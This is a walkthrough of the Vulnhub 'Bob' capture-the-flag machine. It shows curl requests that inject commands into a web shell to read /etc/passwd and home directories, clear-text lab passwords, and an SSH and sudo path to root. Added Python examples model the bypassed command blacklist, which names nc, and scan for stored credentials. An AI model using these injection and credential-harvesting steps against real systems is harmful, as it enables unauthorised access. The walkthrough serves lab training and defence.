Bob: 1.0.1 ~ Vulnhub - Walkthrough (2024)

Contents

  • 1 Objective
  • 2 Methodology
    • 2.1 Discovery
    • 2.2 Entry Point #1 - Port 80 (HTTP)
      • 2.2.1 Enumeration
    • 2.3 Exploitation
  • 3 Final Notes
  • 4 Appendix A: Vulnerability Detail and Mitigation

Objective

Acquire root access and get hold of the flag in /

Source: [VulnHub.com]

Status: [Completed]

Methodology

Define our target

root@kali:# export TANGO=192.168.56.101

Discovery

root@kali:# nmap -O -p- -sT -sV -T5 -o nmap.txt $TANGO
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     ProFTPD 1.3.5b
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
25468/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Entry Point #1 - Port 80 (HTTP)

Enumeration

root@blaksec:~# nikto -h $TANGO
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2018-05-24 18:19:38 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x591 0x5669af30ee8f1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/dev_shell.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/lat_memo.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/passwords.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7539 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2018-05-24 18:19:49 (GMT-4) (11 seconds)
---------------------------------------------------------------------------

Let's take a closer look at that robots.txt

root@kali:~# curl http://$TANGO/robots.txt
User-agent: *
Disallow: /login.php
Disallow: /dev_shell.php
Disallow: /lat_memo.html
Disallow: /passwords.html

dev_shell.php sounds very promising. Dive dive dive!

Exploitation

After a good 30 mins of poking it appeared there is some sort of blacklist - commands like ls, pwd, cat, nc are being blocked. Nothing we can't work around though - all we had to do is to replace ls with find, echo, dir, and cat with strings (see Exploiting web shells - working your way around blacklisted commands for more sweet workarounds).
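A quick side note on why that blacklist was never going to hold, as an added example (not code from this write-up and not the VM's own dev_shell.php, whose source the page does not show): the first function models a filter that rejects a handful of known command names, the second is the allowlist-style runner that would have closed the hole. BLACKLIST, ALLOWED_OPS, ARG_RE and the three sample operations are this example's own assumptions.

```python
"""Added example, not code from the write-up or from the Bob VM: a minimal model
of the command blacklist described for dev_shell.php next to an allowlist-based
runner. BLACKLIST, ALLOWED_OPS and the regexes are this example's own assumptions."""
import re
import subprocess
from typing import Dict, List, Tuple

# --- Vulnerable pattern (assumed to mirror the box's filter) --------------------
# A few command names are rejected; anything else is handed to a shell.
BLACKLIST = {"ls", "pwd", "cat", "nc"}
WORD_RE = re.compile(r"[A-Za-z0-9_./-]+")


def blacklist_allows(user_input: str) -> bool:
    """Return True if the blacklist would let this input reach the shell.

    Equivalent tools (strings, find, echo, dir, ...) are simply not on the list,
    so the filter stops only the exact names it knows about.
    """
    return not (set(WORD_RE.findall(user_input)) & BLACKLIST)


# --- Hardened pattern -------------------------------------------------------------
# The caller selects an operation by name; each maps to a fixed argv prefix and a
# maximum number of arguments, and every argument must match a strict pattern.
ALLOWED_OPS: Dict[str, Tuple[List[str], int]] = {
    "uptime":  (["uptime"], 0),
    "disk":    (["df", "-h"], 0),
    "resolve": (["getent", "hosts"], 1),
}
ARG_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")  # hostname-like, no shell metacharacters


def build_argv(op: str, args: List[str]) -> List[str]:
    """Build the argv for an allowlisted operation or raise ValueError."""
    if op not in ALLOWED_OPS:
        raise ValueError(f"operation not permitted: {op!r}")
    prefix, max_args = ALLOWED_OPS[op]
    if len(args) > max_args:
        raise ValueError(f"too many arguments for {op!r}")
    for a in args:
        if not ARG_RE.match(a):
            raise ValueError(f"argument rejected: {a!r}")
    return prefix + args


def run_op(op: str, args: List[str]) -> str:
    """Execute an allowlisted operation without a shell and return its stdout."""
    argv = build_argv(op, args)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=5, check=False)
    return proc.stdout


if __name__ == "__main__":
    for attempt in ("cat /etc/passwd", "strings /etc/passwd", "find /home"):
        print(f"blacklist lets through {attempt!r}: {blacklist_allows(attempt)}")
    print(run_op("uptime", []))
```

The point of the second half is that there is no string to filter at all: the user never supplies a command, only the name of one of a few fixed operations, and whatever arguments are allowed are validated and passed as a list with no shell in between.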

Let's see what we have!

root@blaksec:~# curl -s -d "in_command=strings /etc/passwd" -X POST http://$TANGO/dev_shell.php
...
c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc:x:1002:1002:James C,,,:/home/jc:/bin/bash
seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash
sshd:x:116:65534::/run/sshd:/usr/sbin/nologin
proftpd:x:117:65534::/run/proftpd:/bin/false
ftp:x:118:65534::/srv/ftp:/bin/false
...

Looks like a few regular users on this host. Let's check them out.

curl -s -d "in_command=find /home" -X POST http://$TANGO/dev_shell.php -o files_home.txt

Bunch of goodies turned up! For the most notable ones:

/home/seb/proftpd-1.3.3c
/home/bob/.old_passwordfile.html
/home/bob/Documents/Secret
/home/bob/Documents/Secret/Keep_Out
/home/bob/Documents/Secret/Keep_Out/Not_p*rn
/home/bob/Documents/Secret/Keep_Out/Not_p*rn/No_Lookie_In_Here
/home/bob/Documents/Secret/Keep_Out/Not_p*rn/No_Lookie_In_Here/notes.sh
/home/bob/Documents/Secret/Keep_Out/p*rn
/home/bob/Documents/Secret/Keep_Out/p*rn/no_p*rn_4_u
/home/bob/Documents/staff.txt
/home/bob/Documents/login.txt.gpg
/home/bob/Downloads/Wheel_Of_Fortune.py
/home/bob/Downloads/Hello_Again.py
/home/elliot/theadminisdumb.txt

Quick look through the files... a few quite interesting entries! The last one was fun to read - elliot b*ches and moans about the admin bragging about his new password.. wait.. yay! we have a password!

root@blaksec:~# curl -s -d "in_command=strings /home/elliot/theadminisdumb.txt" -X POST http://$TANGO/dev_shell.php
...
theadminisdumb
...

Aaaaaand we're in!!!

# ssh elliot@$TANGO -p 25468
[ASCII-art banner reading "Milburg Serv"]
elliot@192.168.56.101's password:
Linux Milburg-High 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
elliot@Milburg-High:~$

Poking around /home(s)... seb does not seem to have anything interesting and neither does jc. bob, however, is worth exploring!

elliot@Milburg-High:/home/bob$ cat .old_passwordfile.html
hey n there .old_passwordfile.html
elliot@Milburg-High:/home/bob$ alias
alias cat='echo hey \n there'
*** rolling my eyes ***
elliot@Milburg-High:/home/bob$ strings .old_passwordfile.html
<html>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>

su'd to each of these users just to see if there were any interesting sudo roles, but nothing fun there, so back to bob!

elliot@Milburg-High:/home/bob/Documents$ file login.txt.gpg
login.txt.gpg: GPG symmetrically encrypted data (AES cipher)

Spent a good hour poking around trying to find the right pass and then found this file. Well, actually I found it earlier and opened it probably 5-6 times.. and then stared at it.. and then squinted.. and it's only when I executed that notes.sh script that it hit me!

elliot@Milburg-High:/home/bob$ ./Documents/Secret/Keep_Out/Not_p*rn/No_Lookie_In_Here/notes.sh
-= Notes =-
Harry Potter is my faviorite
Are you the real me?
Right, I'm ordering pizza this is going nowhere
People just don't get me
Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>
Cucumber
Rest now your eyes are sleepy
Are you gonna stop reading this yet?
Time to fix the server
Everyone is annoying
Sticky notes gotta buy em

Reading the first letter of each line top to bottom: 'HARPOCRATES'

Let's test if it's the right pass

elliot@Milburg-High:/home/bob/Documents$ gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
gpg: keybox '/home/seb/.gnupg/pubring.kbx' created
gpg: AES encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_

From here it's pretty much a wrap-up.

elliot@Milburg-High:/home/bob$ su bob
Password:
bob@Milburg-High:~$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bob may run the following commands on localhost:
    (ALL : ALL) ALL
bob@Milburg-High:~$ sudo su -
root@Milburg-High:/# strings flag.txt
CONGRATS ON GAINING ROOT
[ASCII-art trophy with "#root" on it]
Thanks for playing
~c0rruptedb1t
root@Milburg-High:/#

Final Notes

Sometimes it is OK to follow your gut feeling and deviate from your own style (e.g. trying to spawn a reverse shell) - fun things can be lying in plain view.

Appendix A: Vulnerability Detail and Mitigation

Insufficiently Protected User Credentials

Rating: High

Description: Copies of user passwords were found stored in clear-text files.

Impact: Taking over an account would allow the perpetrator to exercise all privileges and functions granted to that account, including but not limited to accessing restricted data and processes, running restricted programs, and elevated access through sudo roles.

Remediation: Put policies in place educating users about the dangers of storing credentials in unprotected files. Establish a process to perform periodic system scans to detect such data.
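As an added example (not part of the original write-up), here is a small scanner for the kind of clear-text credential files that turned up on this box, the sort of thing the periodic scans in the remediation could start from. The rule names, the regexes, the MAX_BYTES threshold and the default scan root are this example's own assumptions.

```python
"""Added example, not part of the original write-up: a scanner for clear-text
credential files of the kind found on this box. Rule names, regexes and the
MAX_BYTES threshold are this example's own assumptions."""
import os
import re
import sys
from typing import List, NamedTuple

MAX_BYTES = 1_000_000  # assumed: skip files larger than this

# Content rules: (name, regex). Deliberately loose; they surface candidates for
# a human to review rather than trying to be exact.
RULES = [
    # "jc:Qwerty"-style pairs: short name, colon, then a token with no further
    # colons (so /etc/passwd-style multi-colon records do not match)
    ("user_pass_pair", re.compile(r"^[A-Za-z][A-Za-z0-9_-]{1,31}:[^\s:/][^\s:]{3,}$")),
    # prose or config that spells the secret out: "password is ...", "passwd=..."
    ("password_keyword", re.compile(r"(?i)\b(password|passwd|passphrase)\b\s*(is|[:=])\s*\S+")),
]
# File names that suggest stored credentials regardless of content.
NAME_RE = re.compile(r"(?i)(passw|credential|login|secret)")


class Finding(NamedTuple):
    path: str
    line_no: int  # 0 means the file name itself triggered the rule
    rule: str


def scan_content(path: str, text: str) -> List[Finding]:
    """Apply the rules to text already read from `path`.

    Only the location and rule name are recorded, never the matched text, so
    the report does not become one more copy of the credential.
    """
    findings = []
    if NAME_RE.search(os.path.basename(path)):
        findings.append(Finding(path, 0, "suspicious_filename"))
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if "://" in stripped:
            continue  # URLs look like user:pass pairs to the first rule; skip them
        for name, rx in RULES:
            if rx.search(stripped):
                findings.append(Finding(path, no, name))
                break
    return findings


def looks_binary(path: str) -> bool:
    """Cheap text/binary test: a NUL byte in the first 8 KiB means binary."""
    with open(path, "rb") as f:
        return b"\x00" in f.read(8192)


def scan_file(path: str) -> List[Finding]:
    """Read one file (skipping large or binary content) and scan it."""
    try:
        if os.path.getsize(path) > MAX_BYTES or looks_binary(path):
            # still report a suspicious name even when the content is not scanned
            return scan_content(path, "")
        with open(path, "r", encoding="utf-8", errors="replace") as f:
            return scan_content(path, f.read())
    except OSError:
        return []


def scan_tree(root: str) -> List[Finding]:
    """Walk a directory tree (for example /home) without following symlinks."""
    out: List[Finding] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            p = os.path.join(dirpath, fn)
            if not os.path.islink(p) and os.path.isfile(p):
                out.extend(scan_file(p))
    return out


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~")
    for f in scan_tree(root):
        where = f"line {f.line_no}" if f.line_no else "file name"
        print(f"{f.path}: {f.rule} ({where})")
```

Run it as `python3 scan.py /home` from a cron job and review the hits by hand; it reports where a candidate is, not what it says, and it deliberately ignores /etc/passwd-style records and URLs so that the noise stays manageable.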

Author: Melvina Ondricka
